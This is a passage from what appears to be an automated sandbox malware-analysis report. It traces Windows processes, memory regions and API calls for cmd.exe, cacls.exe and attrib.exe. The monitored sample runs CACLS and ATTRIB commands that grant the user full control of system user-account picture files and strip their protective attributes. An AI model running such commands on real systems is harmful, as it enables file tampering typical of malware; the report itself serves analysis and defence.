dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x1aef80 | out: lpCommandLine="ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp\"", lpProcessInformation=0x1aef80*(hProcess=0x4c, hThread=0x50, dwProcessId=0xabc, dwThreadId=0x9b8)) returned 1 [0189.519] CloseHandle (hObject=0x50) returned 1 [0189.519] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0189.519] GetEnvironmentStringsW () returned 0x3a2410* [0189.519] FreeEnvironmentStringsW (penv=0x3a2410) returned 1 [0189.519] WaitForSingleObject (hHandle=0x4c, dwMilliseconds=0xffffffff) returned 0x0 [0189.576] GetExitCodeProcess (in: hProcess=0x4c, lpExitCode=0x1aee74 | out: lpExitCode=0x1aee74*=0x0) returned 1 [0189.576] CloseHandle (hObject=0x4c) returned 1 [0189.576] _vsnwprintf (in: _Buffer=0x1aefbc, _BufferCount=0x13, _Format="%08X", _ArgList=0x1aee80 | out: _Buffer="00000000") returned 8 [0189.576] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0189.576] GetEnvironmentStringsW () returned 0x3a2410* [0189.576] FreeEnvironmentStringsW (penv=0x3a2410) returned 1 [0189.576] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0189.576] GetEnvironmentStringsW () returned 0x3a2410* [0189.576] FreeEnvironmentStringsW (penv=0x3a2410) returned 1 [0189.577] DeleteProcThreadAttributeList (in: lpAttributeList=0x1aeed8 | out: lpAttributeList=0x1aeed8) [0189.577] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.577] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0189.577] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.577] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0189.577] _get_osfhandle (_FileHandle=0) returned 0x3 [0189.577] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0189.577] SetConsoleInputExeNameW () returned 0x1 [0189.577] GetConsoleOutputCP () returned 0x1b5 [0189.577] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0189.577] SetThreadUILanguage (LangId=0x0) returned 0x409 [0189.577] exit (_Code=0) Process: id = "413" image_name = "cacls.exe" filename = "c:\\windows\\system32\\cacls.exe" page_root = "0x7ea16d80" os_pid = "0x88c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "412" os_parent_pid = "0x9a8" cmd_line = "CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp\" /E /G EEBsYm5:F /C " cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27614 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27615 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27616 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27617 start_va = 0x1f0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 27618 start_va = 0x960000 end_va = 0x968fff entry_point = 0x960000 region_type = mapped_file name = "cacls.exe" filename = "\\Windows\\System32\\cacls.exe" (normalized: "c:\\windows\\system32\\cacls.exe") Region: id = 27619 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27620 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27621 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27622 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 27623 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27624 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27625 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27626 start_va = 0x90000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 27627 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 27628 start_va = 0x230000 end_va = 0x296fff entry_point = 0x230000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27629 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27630 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27631 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27632 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27633 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27634 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27635 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Thread: id = 587 os_tid = 0x9ac Thread: id = 588 os_tid = 0x9bc Process: id = "414" image_name = "attrib.exe" filename = "c:\\windows\\system32\\attrib.exe" page_root = "0x7ea16d80" os_pid = "0xabc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "412" os_parent_pid = "0x9a8" cmd_line = "ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile38.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27636 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27637 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27638 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27639 start_va = 0x1d0000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 27640 start_va = 0x7d0000 end_va = 0x7d6fff entry_point = 0x7d0000 region_type = mapped_file name = "attrib.exe" filename = "\\Windows\\System32\\attrib.exe" (normalized: "c:\\windows\\system32\\attrib.exe") Region: id = 27641 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27642 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27643 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27644 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 27645 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27646 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27647 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27648 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27649 start_va = 0x1b0000 end_va = 0x1bffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 27650 start_va = 0x3f0000 end_va = 0x4effff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 27651 start_va = 0x6dec0000 end_va = 0x6dedcfff entry_point = 0x6dec0000 region_type = mapped_file name = "ulib.dll" filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll") Region: id = 27652 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27653 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 27654 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27655 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27656 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 27657 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27658 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27659 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27660 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 27661 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27662 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27663 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 27664 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27665 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Thread: id = 589 os_tid = 0x9b8 Process: id = "415" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16c40" os_pid = "0x5dc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile39.bmp\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 27666 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 27667 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 27668 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 27669 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 27670 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 27671 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 27672 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 27673 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 27674 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 27675 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 27676 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 27677 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 27678 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 27679 start_va = 0x380000 end_va = 0x38ffff entry_point = 0x0 region_type = private name = "private_0x0000000000380000" filename = "" Region: id = 27680 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 27681 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 27682 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 27683 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 27684 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 27685 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 27686 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 27687 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 27688 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 27689 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 27690 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 27691 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 27692 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 27693 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 27694 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 27695 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 27696 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 27697 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 27698 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 27699 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Region: id = 27700 start_va = 0x1350000 end_va = 0x161efff entry_point = 0x1350000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 590 os_tid = 0x9d8 [0189.626] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fb24 | out: lpSystemTimeAsFileTime=0x20fb24*(dwLowDateTime=0xa5ecd780, dwHighDateTime=0x1d440a9)) [0189.626] GetCurrentProcessId () returned 0x5dc [0189.626] GetCurrentThreadId () returned 0x9d8 [0189.626] GetTickCount () returned 0x360a5 [0189.626] QueryPerformanceCounter (in: lpPerformanceCount=0x20fb1c | out: lpPerformanceCount=0x20fb1c*=24641581737) returned 1 [0189.627] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0189.627] __set_app_type (_Type=0x1) [0189.627] __p__fmode () returned 0x76b331f4 [0189.627] __p__commode () returned 0x76b331fc [0189.627] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0189.628] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0189.628] GetCurrentThreadId () returned 0x9d8 [0189.628] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x9d8) returned 0x38 [0189.628] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0189.628] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0189.628] SetThreadUILanguage (LangId=0x0) returned 0x409 [0189.628] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0189.628] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x20fab4 | out: phkResult=0x20fab4*=0x0) returned 0x2 [0189.628] VirtualQuery (in: lpAddress=0x20faeb, lpBuffer=0x20fa84, dwLength=0x1c | out: lpBuffer=0x20fa84*(BaseAddress=0x20f000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0189.628] VirtualQuery (in: lpAddress=0x110000, lpBuffer=0x20fa84, dwLength=0x1c | out: lpBuffer=0x20fa84*(BaseAddress=0x110000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0189.628] VirtualQuery (in: lpAddress=0x111000, lpBuffer=0x20fa84, dwLength=0x1c | out: lpBuffer=0x20fa84*(BaseAddress=0x111000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0189.628] VirtualQuery (in: lpAddress=0x113000, lpBuffer=0x20fa84, dwLength=0x1c | out: lpBuffer=0x20fa84*(BaseAddress=0x113000, AllocationBase=0x110000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0189.628] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x20fa84, dwLength=0x1c | out: lpBuffer=0x20fa84*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0189.628] GetConsoleOutputCP () returned 0x1b5 [0189.628] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0189.628] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0189.628] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.628] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0189.629] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.629] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0189.629] _get_osfhandle (_FileHandle=1) returned 0x7 [0189.629] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0189.629] _get_osfhandle (_FileHandle=0) returned 0x3 [0189.629] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0189.629] _get_osfhandle (_FileHandle=0) returned 0x3 [0189.629] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0189.629] GetEnvironmentStringsW () returned 0x3e0308* [0189.629] FreeEnvironmentStringsW (penv=0x3e0308) returned 1 [0189.630] GetEnvironmentStringsW () returned 0x3e0308* [0189.630] FreeEnvironmentStringsW (penv=0x3e0308) returned 1 [0189.630] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20ea24 | out: phkResult=0x20ea24*=0x40) returned 0x0 [0189.630] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ea2c, lpData=0x20ea30, lpcbData=0x20ea28*=0x1000 | out: lpType=0x20ea2c*=0x0, lpData=0x20ea30*=0xb8, lpcbData=0x20ea28*=0x1000) returned 0x2 [0189.630] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ea2c, lpData=0x20ea30, lpcbData=0x20ea28*=0x1000 | out: lpType=0x20ea2c*=0x4, lpData=0x20ea30*=0x1, lpcbData=0x20ea28*=0x4) returned 0x0 [0189.630] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x20ea2c, lpData=0x20ea30, lpcbData=0x20ea28*=0x1000 | out: lpType=0x20ea2c*=0x0, lpData=0x20ea30*=0x1, lpcbData=0x20ea28*=0x1000) returned 0x2 [0189.630] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x20ea2c, lpData=0x20ea30, lpcbData=0x20ea28*=0x1000 | out: lpType=0x20ea2c*=0x4, lpData=0x20ea30*=0x0, lpcbData=0x20ea28*=0x4) returned 0x0 [0189.630] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x20ea2c, lpData=0x20ea30, lpcbData=0x20ea28*=0x1000 | out: lpType=0x20ea2c*=0x4, lpData=0x20ea30*=0x40, lpcbData=0x20ea28*=0x4) returned 0x0 [0189.630] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x20ea2c, lpData=0x20ea30, lpcbData=0x20ea28*=0x1000 | out: lpType=0x20ea2c*=0x4, lpData=0x20ea30*=0x40, lpcbData=0x20ea28*=0x4) returned 0x0 [0189.630] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x20ea2c, lpData=0x20ea30, lpcbData=0x20ea28*=0x1000 | out: lpType=0x20ea2c*=0x0, lpData=0x20ea30*=0x40, lpcbData=0x20ea28*=0x1000) returned 0x2 [0189.630] RegCloseKey (hKey=0x40) returned 0x0 [0189.630] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x20ea24 | out: phkResult=0x20ea24*=0x40) returned 0x0 [0189.630] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x20ea2c, lpData=0x20ea30, lpcbData=0x20ea28*=0x1000 | out: lpType=0x20ea2c*=0x0, lpData=0x20ea30*=0x40, lpcbData=0x20ea28*=0x1000) returned 0x2 [0189.630] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x20ea2c, lpData=0x20ea30, lpcbData=0x20ea28*=0x1000 | out: lpType=0x20ea2c*=0x4, lpData=0x20ea30*=0x1, lpcbData=0x20ea28*=0x4) returned 